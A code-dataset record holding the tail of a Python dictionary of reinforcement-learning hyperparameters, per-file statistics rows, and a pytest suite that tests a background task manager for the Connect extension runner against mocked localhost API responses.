"prior_scale" : 10,
"eps" : 1000
},
},
"gym_cheetah":{
"EnsembleSAC":{
"eff_batch_size" : 1024,
"mask_prob" : 0.9,
"ucb_lambda" : 0
},
"IV_EnsembleSAC":{
"eff_batch_size" : 1024,
"mask_prob" : 0.9,
"ucb_lambda" : 10,
"minimal_eff_bs_ratio" : 0.99,
"dynamic_eps" : True
},
"IV_ProbEnsembleSAC":{
"eff_batch_size" : 1024,
"mask_prob" : 1,
"ucb_lambda" : 0,
"minimal_eff_bs_ratio" : 0.99,
"dynamic_eps" : True,
"loss_att_weight" : 2
},
"IV_SAC":{
"eff_batch_size" : 1024,
"mask_prob" : 1,
"ucb_lambda" : 0,
"minimal_eff_bs_ratio" : 0.99,
"dynamic_eps" : True,
"loss_att_weight" : 2
},
"IV_ProbSAC":{
"loss_att_weight" : 5,
"minimal_eff_bs_ratio" : 0.5
}
},
"gym_walker2d":{
"EnsembleSAC":{
"eff_batch_size" : 512,
"mask_prob" : 1,
"ucb_lambda" : 1
},
"IV_EnsembleSAC":{
"eff_batch_size" : 1024,
"mask_prob" : 0.9,
"ucb_lambda" : 10,
"minimal_eff_bs_ratio" : 0.8,
"dynamic_eps" : True
},
"IV_ProbEnsembleSAC":{
"eff_batch_size" : 1024,
"mask_prob" : 0.9,
"ucb_lambda" : 10,
"minimal_eff_bs_ratio" : 0.8,
"dynamic_eps" : True,
"loss_att_weight" : 5
},
"IV_SAC":{
"eff_batch_size" : 1024,
"mask_prob" : 0.9,
"ucb_lambda" : 10,
"minimal_eff_bs_ratio" : 0.8,
"dynamic_eps" : True,
"loss_att_weight" : 5
},
},
"gym_hopper":{
"EnsembleSAC":{
"eff_batch_size" : 512,
"mask_prob" : 1,
"ucb_lambda" : 10
},
"IV_ProbEnsembleSAC":{
"eff_batch_size" : 1024,
"mask_prob" : 0.7,
"ucb_lambda" : 10,
"minimal_eff_bs_ratio" : 0.8,
"dynamic_eps" : True,
"loss_att_weight" : 10
},
"IV_SAC":{
"eff_batch_size" : 1024,
"mask_prob" : 0.7,
"ucb_lambda" : 10,
"minimal_eff_bs_ratio" : 0.8,
"dynamic_eps" : True,
"loss_att_weight" : 10
},
},
"gym_ant":{
"EnsembleSAC":{
"eff_batch_size" : 512,
"mask_prob" : 0.9,
"ucb_lambda" : 10
},
"IV_ProbEnsembleSAC":{
"eff_batch_size" : 1024,
"mask_prob" : 1,
"ucb_lambda" : 1,
"minimal_eff_bs_ratio" : 0.9,
"dynamic_eps" : True,
"loss_att_weight" : 5
},
"IV_SAC":{
"eff_batch_size" : 1024,
"mask_prob" : 1,
"ucb_lambda" : 1,
"minimal_eff_bs_ratio" : 0.9,
"dynamic_eps" : True,
"loss_att_weight" : 5
},
},
"cartpole":{
"BootstrapDQN":{
"batch_size" : 128,
"mask_prob" : 5
},
"IV_BootstrapDQN":{
"batch_size" : 128,
"mask_prob" : 0.5,
"minimal_eff_bs_ratio" : 0.99
},
"IV_ProbEnsembleDQN":{
"batch_size" : 128,
"mask_prob" : 0.5,
"minimal_eff_bs_ratio" : 0.99,
"loss_att_weight" : 10
},
"IV_BootstrapDQN":{
"batch_size" : 128,
"mask_prob" : 0.5,
"minimal_eff_bs_ratio" : 0.99,
},
"IV_ProbDQN": {
"loss_att_weight" : 0.1,
"minimal_eff_bs_ratio" : 0.7
},
"ProbEnsembleDQN":{
"batch_size" : 128,
"loss_att_weight" : 10,
"mask_prob" : 0.5
}
}
})
| 18.318681
| 38
| 0.420066
| 716
| 6,668
| 3.581006
| 0.103352
| 0.112324
| 0.126365
| 0.099454
| 0.880265
| 0.846724
| 0.804212
| 0.781591
| 0.781591
| 0.778861
| 0
| 0.112395
| 0.428914
| 6,668
| 363
| 39
| 18.369146
| 0.560924
| 0
| 0
| 0.711538
| 0
| 0
| 0.347383
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f4056394ea1442fe773de4cc6e8fb8fa335cbc33
| 32,794
|
py
|
Python
|
tests/managers/test_background.py
|
bdjilka/connect-extension-runner
|
7930b34dae92addb3807984fd553debc2b78ac23
|
[
"Apache-2.0"
] | null | null | null |
tests/managers/test_background.py
|
bdjilka/connect-extension-runner
|
7930b34dae92addb3807984fd553debc2b78ac23
|
[
"Apache-2.0"
] | null | null | null |
tests/managers/test_background.py
|
bdjilka/connect-extension-runner
|
7930b34dae92addb3807984fd553debc2b78ac23
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import time
import pytest
from connect.eaas.config import ConfigHelper
from connect.eaas.constants import (
ASSET_REQUEST_TASK_TYPES,
BACKGROUND_TASK_TYPES,
LISTING_REQUEST_TASK_TYPES,
TASK_TYPE_EXT_METHOD_MAP,
TIER_CONFIG_REQUEST_TASK_TYPES,
)
from connect.eaas.dataclasses import (
ConfigurationPayload,
Message,
MessageType,
ResultType,
TaskCategory,
TaskPayload,
TaskType,
)
from connect.eaas.extension import ProcessingResponse
from connect.eaas.handler import ExtensionHandler
from connect.eaas.managers import BackgroundTasksManager
@pytest.mark.asyncio
@pytest.mark.parametrize(
'task_type',
BACKGROUND_TASK_TYPES,
)
async def test_sync(mocker, extension_cls, task_type, config_payload):
config = ConfigHelper()
config.update_dynamic_config(ConfigurationPayload(**config_payload))
mocker.patch.object(
ExtensionHandler,
'capabilities',
new_callable=mocker.PropertyMock(return_value={task_type: ['pending']}),
)
mocker.patch('connect.eaas.handler.get_extension_class')
mocker.patch('connect.eaas.handler.get_extension_type')
mocked_time = mocker.patch('connect.eaas.managers.background.time')
mocked_time.sleep = time.sleep
mocked_time.monotonic.side_effect = (1.0, 2.0)
handler = ExtensionHandler(config)
handler.extension_class = extension_cls(TASK_TYPE_EXT_METHOD_MAP[task_type])
handler.extension_type = 'sync'
result_queue = mocker.patch.object(asyncio.Queue, 'put')
manager = BackgroundTasksManager(config, handler, result_queue)
manager.get_argument = mocker.AsyncMock(return_value={'id': 'PR-000', 'status': 'pending'})
task = TaskPayload(
'TQ-000',
TaskCategory.BACKGROUND,
task_type,
'PR-000',
runtime=1.0,
)
await manager.submit(task)
await asyncio.sleep(.01)
message = Message(message_type=MessageType.TASK, data=task)
message.data.result = ResultType.SUCCESS
result_queue.assert_awaited_once_with(message.data)
@pytest.mark.asyncio
@pytest.mark.parametrize(
'task_type',
BACKGROUND_TASK_TYPES,
)
async def test_async(mocker, extension_cls, task_type, config_payload):
config = ConfigHelper()
config.update_dynamic_config(ConfigurationPayload(**config_payload))
mocker.patch.object(
ExtensionHandler,
'capabilities',
new_callable=mocker.PropertyMock(return_value={task_type: ['pending']}),
)
mocker.patch('connect.eaas.handler.get_extension_class')
mocker.patch('connect.eaas.handler.get_extension_type')
mocked_time = mocker.patch('connect.eaas.managers.background.time')
mocked_time.sleep = time.sleep
mocked_time.monotonic.side_effect = (1.0, 2.0)
handler = ExtensionHandler(config)
handler.extension_class = extension_cls(TASK_TYPE_EXT_METHOD_MAP[task_type], async_impl=True)
handler.extension_type = 'async'
result_queue = mocker.patch.object(asyncio.Queue, 'put')
manager = BackgroundTasksManager(config, handler, result_queue)
manager.get_argument = mocker.AsyncMock(return_value={'id': 'PR-000', 'status': 'pending'})
task = TaskPayload(
'TQ-000',
TaskCategory.BACKGROUND,
task_type,
'PR-000',
runtime=1.0,
)
await manager.submit(task)
await asyncio.sleep(.01)
message = Message(message_type=MessageType.TASK, data=task)
message.data.result = ResultType.SUCCESS
result_queue.assert_awaited_once_with(message.data)
@pytest.mark.asyncio
@pytest.mark.parametrize(
'task_type',
ASSET_REQUEST_TASK_TYPES,
)
async def test_get_argument_subscription(
mocker, httpx_mock, extension_cls, task_type,
config_payload, task_payload, unused_port,
):
mocker.patch(
'connect.eaas.config.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
'background_task_max_execution_time': 300,
'interactive_task_max_execution_time': 120,
'scheduled_task_max_execution_time': 43200,
},
)
api_url = f'https://127.0.0.1:{unused_port}/public/v1'
mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
config = ConfigHelper()
config.update_dynamic_config(ConfigurationPayload(**config_payload))
mocker.patch.object(
ExtensionHandler,
'capabilities',
new_callable=mocker.PropertyMock(return_value={task_type: ['pending']}),
)
mocker.patch('connect.eaas.handler.get_extension_class')
mocker.patch('connect.eaas.handler.get_extension_type')
handler = ExtensionHandler(config)
handler.extension_class = extension_cls(TASK_TYPE_EXT_METHOD_MAP[task_type], async_impl=True)
handler.extension_type = 'async'
result_queue = mocker.patch.object(asyncio.Queue, 'put')
manager = BackgroundTasksManager(config, handler, result_queue)
pr_data = {'id': 'PR-000', 'status': 'pending'}
httpx_mock.add_response(
method='GET',
url=f'{api_url}/requests?and(eq(id,PR-000),in(status,(pending)))&limit=0&offset=0',
json=[],
headers={'Content-Range': 'items 0-0/1'},
)
httpx_mock.add_response(
method='GET',
url=f'{api_url}/requests/PR-000',
json=pr_data,
)
task = TaskPayload(
**task_payload(TaskCategory.BACKGROUND, task_type, 'PR-000'),
)
assert await manager.get_argument(task) == pr_data
@pytest.mark.asyncio
@pytest.mark.parametrize(
'task_type',
TIER_CONFIG_REQUEST_TASK_TYPES,
)
async def test_get_argument_tcr(
mocker, httpx_mock, extension_cls, task_type,
config_payload, task_payload, unused_port,
):
mocker.patch(
'connect.eaas.config.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
'background_task_max_execution_time': 300,
'interactive_task_max_execution_time': 120,
'scheduled_task_max_execution_time': 43200,
},
)
api_url = f'https://127.0.0.1:{unused_port}/public/v1'
mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
config = ConfigHelper()
config.update_dynamic_config(ConfigurationPayload(**config_payload))
mocker.patch.object(
ExtensionHandler,
'capabilities',
new_callable=mocker.PropertyMock(return_value={task_type: ['pending']}),
)
mocker.patch('connect.eaas.handler.get_extension_class')
mocker.patch('connect.eaas.handler.get_extension_type')
handler = ExtensionHandler(config)
handler.extension_class = extension_cls(TASK_TYPE_EXT_METHOD_MAP[task_type], async_impl=True)
handler.extension_type = 'async'
result_queue = mocker.patch.object(asyncio.Queue, 'put')
manager = BackgroundTasksManager(config, handler, result_queue)
tcr_data = {'id': 'TCR-000', 'status': 'pending'}
httpx_mock.add_response(
method='GET',
url=(
f'{api_url}/tier/config-requests?'
'and(eq(id,TCR-000),in(status,(pending)))&limit=0&offset=0'
),
json=[],
headers={'Content-Range': 'items 0-0/1'},
)
httpx_mock.add_response(
method='GET',
url=f'{api_url}/tier/config-requests/TCR-000',
json=tcr_data,
)
task = TaskPayload(
**task_payload(TaskCategory.BACKGROUND, task_type, 'TCR-000'),
)
assert await manager.get_argument(task) == tcr_data
@pytest.mark.asyncio
async def test_get_argument_tar(
mocker, httpx_mock, extension_cls,
config_payload, task_payload, unused_port,
):
mocker.patch(
'connect.eaas.config.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
'background_task_max_execution_time': 300,
'interactive_task_max_execution_time': 120,
'scheduled_task_max_execution_time': 43200,
},
)
api_url = f'https://127.0.0.1:{unused_port}/public/v1'
mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
config = ConfigHelper()
config.update_dynamic_config(ConfigurationPayload(**config_payload))
mocker.patch.object(
ExtensionHandler,
'capabilities',
new_callable=mocker.PropertyMock(
return_value={TaskType.TIER_ACCOUNT_UPDATE_REQUEST_PROCESSING: ['pending']},
),
)
mocker.patch('connect.eaas.handler.get_extension_class')
mocker.patch('connect.eaas.handler.get_extension_type')
handler = ExtensionHandler(config)
handler.extension_class = extension_cls(
TaskType.TIER_ACCOUNT_UPDATE_REQUEST_PROCESSING,
)
handler.extension_type = 'sync'
result_queue = mocker.patch.object(asyncio.Queue, 'put')
manager = BackgroundTasksManager(config, handler, result_queue)
httpx_mock.add_response(
method='GET',
url=(
f'{api_url}/tier/account-requests?'
'and(eq(id,TAR-000),in(status,(pending)))&limit=0&offset=0'
),
json=[],
headers={'Content-Range': 'items 0-0/1'},
)
tar_data = {
'id': 'TAR-000',
'status': 'pending',
'account': {'id': 'TA-000'},
'product': {'id': 'PRD-000'},
}
httpx_mock.add_response(
method='GET',
url=f'{api_url}/tier/account-requests/TAR-000',
json=tar_data,
)
assets_filter = (
'and(eq(product.id,PRD-000),eq(connection.type,preview),'
'or(eq(tiers.tier2.id,TA-000),eq(tiers.tier1.id,TA-000),eq(tiers.customer.id,TA-000)))'
'&limit=0&offset=0'
)
httpx_mock.add_response(
method='GET',
url=f'{api_url}/assets?{assets_filter}',
headers={'Content-Range': 'items 0-1/1'},
)
task = TaskPayload(
**task_payload(
TaskCategory.BACKGROUND,
TaskType.TIER_ACCOUNT_UPDATE_REQUEST_PROCESSING,
'TAR-000',
),
)
assert await manager.get_argument(task) == tar_data
@pytest.mark.asyncio
async def test_get_argument_tar_no_assets(
mocker, httpx_mock, extension_cls,
config_payload, task_payload, unused_port,
):
mocker.patch(
'connect.eaas.config.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
'background_task_max_execution_time': 300,
'interactive_task_max_execution_time': 120,
'scheduled_task_max_execution_time': 43200,
},
)
api_url = f'https://127.0.0.1:{unused_port}/public/v1'
mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
config = ConfigHelper()
config.update_dynamic_config(ConfigurationPayload(**config_payload))
mocker.patch.object(
ExtensionHandler,
'capabilities',
new_callable=mocker.PropertyMock(
return_value={TaskType.TIER_ACCOUNT_UPDATE_REQUEST_PROCESSING: ['pending']},
),
)
mocker.patch('connect.eaas.handler.get_extension_class')
mocker.patch('connect.eaas.handler.get_extension_type')
handler = ExtensionHandler(config)
handler.extension_class = extension_cls(
TaskType.TIER_ACCOUNT_UPDATE_REQUEST_PROCESSING,
)
handler.extension_type = 'sync'
result_queue = mocker.patch.object(asyncio.Queue, 'put')
manager = BackgroundTasksManager(config, handler, result_queue)
manager.send_skip_response = mocker.MagicMock()
tar_data = {
'id': 'TAR-000',
'status': 'pending',
'account': {'id': 'TA-000'},
'product': {'id': 'PRD-000'},
}
httpx_mock.add_response(
method='GET',
url=(
f'{api_url}/tier/account-requests?'
'and(eq(id,TAR-000),in(status,(pending)))&limit=0&offset=0'
),
json=[],
headers={'Content-Range': 'items 0-0/1'},
)
httpx_mock.add_response(
method='GET',
url=f'{api_url}/tier/account-requests/TAR-000',
json=tar_data,
)
assets_filter = (
'and(eq(product.id,PRD-000),eq(connection.type,preview),'
'or(eq(tiers.tier2.id,TA-000),eq(tiers.tier1.id,TA-000),eq(tiers.customer.id,TA-000)))'
'&limit=0&offset=0'
)
httpx_mock.add_response(
method='GET',
url=f'{api_url}/assets?{assets_filter}',
headers={'Content-Range': 'items 0-0/0'},
)
task = TaskPayload(
**task_payload(
TaskCategory.BACKGROUND,
TaskType.TIER_ACCOUNT_UPDATE_REQUEST_PROCESSING,
'TAR-000',
),
)
assert await manager.get_argument(task) is None
manager.send_skip_response.assert_called_once_with(
task,
(
'The Tier Account related to this request does not '
'have assets with a preview connection.'
),
)
@pytest.mark.asyncio
@pytest.mark.parametrize(
'task_type',
LISTING_REQUEST_TASK_TYPES,
)
async def test_get_argument_listing_request(
mocker, httpx_mock, extension_cls, task_type,
config_payload, task_payload, unused_port,
):
mocker.patch(
'connect.eaas.config.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
'background_task_max_execution_time': 300,
'interactive_task_max_execution_time': 120,
'scheduled_task_max_execution_time': 43200,
},
)
api_url = f'https://127.0.0.1:{unused_port}/public/v1'
mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
config = ConfigHelper()
config.update_dynamic_config(ConfigurationPayload(**config_payload))
mocker.patch.object(
ExtensionHandler,
'capabilities',
new_callable=mocker.PropertyMock(
return_value={task_type: ['pending']},
),
)
mocker.patch('connect.eaas.handler.get_extension_class')
mocker.patch('connect.eaas.handler.get_extension_type')
handler = ExtensionHandler(config)
handler.extension_class = extension_cls(
task_type,
)
handler.extension_type = 'sync'
result_queue = mocker.patch.object(asyncio.Queue, 'put')
manager = BackgroundTasksManager(config, handler, result_queue)
lstr_data = {
'id': 'LSTR-000',
'state': 'pending',
'listing': {'contract': {'marketplace': {'id': 'MP-0000'}}},
'product': {'id': 'PRD-000'},
}
httpx_mock.add_response(
method='GET',
url=(
f'{api_url}/listing-requests?'
'and(eq(id,LSTR-000),in(state,(pending)))&limit=0&offset=0'
),
json=[],
headers={'Content-Range': 'items 0-0/1'},
)
httpx_mock.add_response(
method='GET',
url=f'{api_url}/listing-requests/LSTR-000',
json=lstr_data,
)
marketplace_data = {
'hubs': [
{
'hub': {'id': 'HB-0000'},
},
],
}
httpx_mock.add_response(
method='GET',
url=f'{api_url}/marketplaces/MP-0000',
json=marketplace_data,
)
task = TaskPayload(
**task_payload(
TaskCategory.BACKGROUND,
task_type,
'LSTR-000',
),
)
assert await manager.get_argument(task) == lstr_data
@pytest.mark.asyncio
@pytest.mark.parametrize(
'task_type',
LISTING_REQUEST_TASK_TYPES,
)
async def test_get_argument_listing_request_vendor(
mocker, httpx_mock, extension_cls, task_type,
config_payload, task_payload, unused_port,
):
mocker.patch(
'connect.eaas.config.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
'background_task_max_execution_time': 300,
'interactive_task_max_execution_time': 120,
'scheduled_task_max_execution_time': 43200,
},
)
api_url = f'https://127.0.0.1:{unused_port}/public/v1'
mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
config = ConfigHelper()
dyn_cfg = ConfigurationPayload(**config_payload)
dyn_cfg.hub_id = None
config.update_dynamic_config(dyn_cfg)
mocker.patch.object(
ExtensionHandler,
'capabilities',
new_callable=mocker.PropertyMock(
return_value={task_type: ['pending']},
),
)
mocker.patch('connect.eaas.handler.get_extension_class')
mocker.patch('connect.eaas.handler.get_extension_type')
handler = ExtensionHandler(config)
handler.extension_class = extension_cls(
task_type,
)
handler.extension_type = 'sync'
result_queue = mocker.patch.object(asyncio.Queue, 'put')
manager = BackgroundTasksManager(config, handler, result_queue)
lstr_data = {
'id': 'LSTR-000',
'status': 'pending',
'listing': {'contract': {'marketplace': {'id': 'MP-0000'}}},
'product': {'id': 'PRD-000'},
}
httpx_mock.add_response(
method='GET',
url=(
f'{api_url}/listing-requests?'
'and(eq(id,LSTR-000),in(state,(pending)))&limit=0&offset=0'
),
json=[],
headers={'Content-Range': 'items 0-0/1'},
)
httpx_mock.add_response(
method='GET',
url=f'{api_url}/listing-requests/LSTR-000',
json=lstr_data,
)
task = TaskPayload(
**task_payload(
TaskCategory.BACKGROUND,
task_type,
'LSTR-000',
),
)
assert await manager.get_argument(task) == lstr_data
@pytest.mark.asyncio
@pytest.mark.parametrize(
'task_type',
LISTING_REQUEST_TASK_TYPES,
)
async def test_get_argument_listing_request_no_hub(
mocker, httpx_mock, extension_cls, task_type,
config_payload, task_payload, unused_port,
):
mocker.patch(
'connect.eaas.config.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
'background_task_max_execution_time': 300,
'interactive_task_max_execution_time': 120,
'scheduled_task_max_execution_time': 43200,
},
)
api_url = f'https://127.0.0.1:{unused_port}/public/v1'
mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
config = ConfigHelper()
config.update_dynamic_config(ConfigurationPayload(**config_payload))
mocker.patch.object(
ExtensionHandler,
'capabilities',
new_callable=mocker.PropertyMock(
return_value={task_type: ['pending']},
),
)
mocker.patch('connect.eaas.handler.get_extension_class')
mocker.patch('connect.eaas.handler.get_extension_type')
handler = ExtensionHandler(config)
handler.extension_class = extension_cls(
task_type,
)
handler.extension_type = 'sync'
result_queue = mocker.patch.object(asyncio.Queue, 'put')
manager = BackgroundTasksManager(config, handler, result_queue)
manager.send_skip_response = mocker.MagicMock()
lstr_data = {
'id': 'LSTR-000',
'status': 'pending',
'listing': {'contract': {'marketplace': {'id': 'MP-0000'}}},
'product': {'id': 'PRD-000'},
}
httpx_mock.add_response(
method='GET',
url=(
f'{api_url}/listing-requests?'
'and(eq(id,LSTR-000),in(state,(pending)))&limit=0&offset=0'
),
json=[],
headers={'Content-Range': 'items 0-0/1'},
)
httpx_mock.add_response(
method='GET',
url=f'{api_url}/listing-requests/LSTR-000',
json=lstr_data,
)
marketplace_data = {
'hubs': [
{
'hub': {'id': 'HB-0001'},
},
],
}
httpx_mock.add_response(
method='GET',
url=f'{api_url}/marketplaces/MP-0000',
json=marketplace_data,
)
task = TaskPayload(
**task_payload(
TaskCategory.BACKGROUND,
task_type,
'LSTR-000',
),
)
assert await manager.get_argument(task) is None
manager.send_skip_response.assert_called_once_with(
task,
(
'The marketplace MP-0000 does not belong '
f'to hub {config.hub_id}.'
),
)
@pytest.mark.asyncio
async def test_get_argument_usage_file(
mocker, httpx_mock, extension_cls,
config_payload, task_payload, unused_port,
):
mocker.patch(
'connect.eaas.config.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
'background_task_max_execution_time': 300,
'interactive_task_max_execution_time': 120,
'scheduled_task_max_execution_time': 43200,
},
)
api_url = f'https://127.0.0.1:{unused_port}/public/v1'
mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
config = ConfigHelper()
config.update_dynamic_config(ConfigurationPayload(**config_payload))
mocker.patch.object(
ExtensionHandler,
'capabilities',
new_callable=mocker.PropertyMock(
return_value={TaskType.USAGE_FILE_REQUEST_PROCESSING: ['pending']},
),
)
mocker.patch('connect.eaas.handler.get_extension_class')
mocker.patch('connect.eaas.handler.get_extension_type')
handler = ExtensionHandler(config)
handler.extension_class = extension_cls(
TASK_TYPE_EXT_METHOD_MAP[TaskType.USAGE_FILE_REQUEST_PROCESSING],
async_impl=True,
)
handler.extension_type = 'async'
result_queue = mocker.patch.object(asyncio.Queue, 'put')
manager = BackgroundTasksManager(config, handler, result_queue)
uf_data = {'id': 'UF-000', 'status': 'pending'}
httpx_mock.add_response(
method='GET',
url=(
f'{api_url}/usage/files?'
'and(eq(id,UF-000),in(status,(pending)))&limit=0&offset=0'
),
json=[],
headers={'Content-Range': 'items 0-0/1'},
)
httpx_mock.add_response(
method='GET',
url=f'{api_url}/usage/files/UF-000',
json=uf_data,
)
task = TaskPayload(
**task_payload(TaskCategory.BACKGROUND, TaskType.USAGE_FILE_REQUEST_PROCESSING, 'UF-000'),
)
assert await manager.get_argument(task) == uf_data
@pytest.mark.asyncio
async def test_get_argument_usage_chunks(
mocker, httpx_mock, extension_cls,
config_payload, task_payload, unused_port,
):
mocker.patch(
'connect.eaas.config.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
'background_task_max_execution_time': 300,
'interactive_task_max_execution_time': 120,
'scheduled_task_max_execution_time': 43200,
},
)
api_url = f'https://127.0.0.1:{unused_port}/public/v1'
mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
config = ConfigHelper()
config.update_dynamic_config(ConfigurationPayload(**config_payload))
mocker.patch.object(
ExtensionHandler,
'capabilities',
new_callable=mocker.PropertyMock(
return_value={TaskType.PART_USAGE_FILE_REQUEST_PROCESSING: ['pending']},
),
)
mocker.patch('connect.eaas.handler.get_extension_class')
mocker.patch('connect.eaas.handler.get_extension_type')
handler = ExtensionHandler(config)
handler.extension_class = extension_cls(
TASK_TYPE_EXT_METHOD_MAP[TaskType.PART_USAGE_FILE_REQUEST_PROCESSING],
async_impl=True,
)
handler.extension_type = 'async'
result_queue = mocker.patch.object(asyncio.Queue, 'put')
manager = BackgroundTasksManager(config, handler, result_queue)
uf_data = {'id': 'UFC-000', 'status': 'pending'}
httpx_mock.add_response(
method='GET',
url=(
f'{api_url}/usage/chunks?'
'and(eq(id,UFC-000),in(status,(pending)))&limit=0&offset=0'
),
json=[],
headers={'Content-Range': 'items 0-0/1'},
)
httpx_mock.add_response(
method='GET',
url=f'{api_url}/usage/chunks/UFC-000',
json=uf_data,
)
task = TaskPayload(
**task_payload(
TaskCategory.BACKGROUND, TaskType.PART_USAGE_FILE_REQUEST_PROCESSING, 'UFC-000',
),
)
assert await manager.get_argument(task) == uf_data
@pytest.mark.asyncio
@pytest.mark.parametrize(
('task_type', 'status_field', 'endpoint'),
(
(TaskType.ASSET_PURCHASE_REQUEST_PROCESSING, 'status', '/requests'),
(TaskType.ASSET_CHANGE_REQUEST_PROCESSING, 'status', '/requests'),
(TaskType.ASSET_SUSPEND_REQUEST_PROCESSING, 'status', '/requests'),
(TaskType.ASSET_RESUME_REQUEST_PROCESSING, 'status', '/requests'),
(TaskType.ASSET_CANCEL_REQUEST_PROCESSING, 'status', '/requests'),
(TaskType.ASSET_ADJUSTMENT_REQUEST_PROCESSING, 'status', '/requests'),
(TaskType.TIER_CONFIG_SETUP_REQUEST_PROCESSING, 'status', '/tier/config-requests'),
(TaskType.TIER_CONFIG_CHANGE_REQUEST_PROCESSING, 'status', '/tier/config-requests'),
(TaskType.TIER_CONFIG_ADJUSTMENT_REQUEST_PROCESSING, 'status', '/tier/config-requests'),
(TaskType.LISTING_NEW_REQUEST_PROCESSING, 'state', '/listing-requests'),
(TaskType.LISTING_REMOVE_REQUEST_PROCESSING, 'state', '/listing-requests'),
(TaskType.TIER_ACCOUNT_UPDATE_REQUEST_PROCESSING, 'status', '/tier/account-requests'),
(TaskType.USAGE_FILE_REQUEST_PROCESSING, 'status', '/usage/files'),
(TaskType.PART_USAGE_FILE_REQUEST_PROCESSING, 'status', '/usage/chunks'),
),
)
async def test_get_argument_unsupported_status(
mocker, httpx_mock, extension_cls,
config_payload, task_payload, unused_port,
task_type, status_field, endpoint,
):
mocker.patch(
'connect.eaas.config.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
'background_task_max_execution_time': 300,
'interactive_task_max_execution_time': 120,
'scheduled_task_max_execution_time': 43200,
},
)
api_url = f'https://127.0.0.1:{unused_port}/public/v1'
mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
config = ConfigHelper()
config.update_dynamic_config(ConfigurationPayload(**config_payload))
mocker.patch.object(
ExtensionHandler,
'capabilities',
new_callable=mocker.PropertyMock(
return_value={task_type: ['supported']},
),
)
mocker.patch('connect.eaas.handler.get_extension_class')
mocker.patch('connect.eaas.handler.get_extension_type')
handler = ExtensionHandler(config)
handler.extension_class = extension_cls(
TASK_TYPE_EXT_METHOD_MAP[task_type],
async_impl=True,
)
handler.extension_type = 'async'
result_queue = mocker.patch.object(asyncio.Queue, 'put')
manager = BackgroundTasksManager(config, handler, result_queue)
manager.send_skip_response = mocker.MagicMock()
httpx_mock.add_response(
method='GET',
url=(
f'{api_url}{endpoint}?'
f'and(eq(id,OBJ-000),in({status_field},(supported)))&limit=0&offset=0'
),
json=[],
headers={'Content-Range': 'items 0-0/0'},
)
task = TaskPayload(
**task_payload(
TaskCategory.BACKGROUND, task_type, 'OBJ-000',
),
)
assert await manager.get_argument(task) is None
manager.send_skip_response.assert_called_once_with(
task,
'The request status does not match the supported statuses: supported.',
)
@pytest.mark.asyncio
async def test_build_response_done(task_payload):
config = ConfigHelper()
manager = BackgroundTasksManager(config, None, None)
task = TaskPayload(
**task_payload(
TaskCategory.BACKGROUND, TaskType.PART_USAGE_FILE_REQUEST_PROCESSING, 'UFC-000',
),
)
future = asyncio.Future()
result = ProcessingResponse.done()
future.set_result(result)
response = await manager.build_response(task, future)
assert response.task_id == task.task_id
assert response.result == result.status
@pytest.mark.asyncio
@pytest.mark.parametrize(
'result',
(
ProcessingResponse.fail(output='message'),
ProcessingResponse.skip(output='message'),
),
)
async def test_build_response_fail_skip(task_payload, result):
config = ConfigHelper()
manager = BackgroundTasksManager(config, None, None)
task = TaskPayload(
**task_payload(
TaskCategory.BACKGROUND, TaskType.PART_USAGE_FILE_REQUEST_PROCESSING, 'UFC-000',
),
)
future = asyncio.Future()
future.set_result(result)
response = await manager.build_response(task, future)
assert response.task_id == task.task_id
assert response.result == result.status
assert response.output == result.output
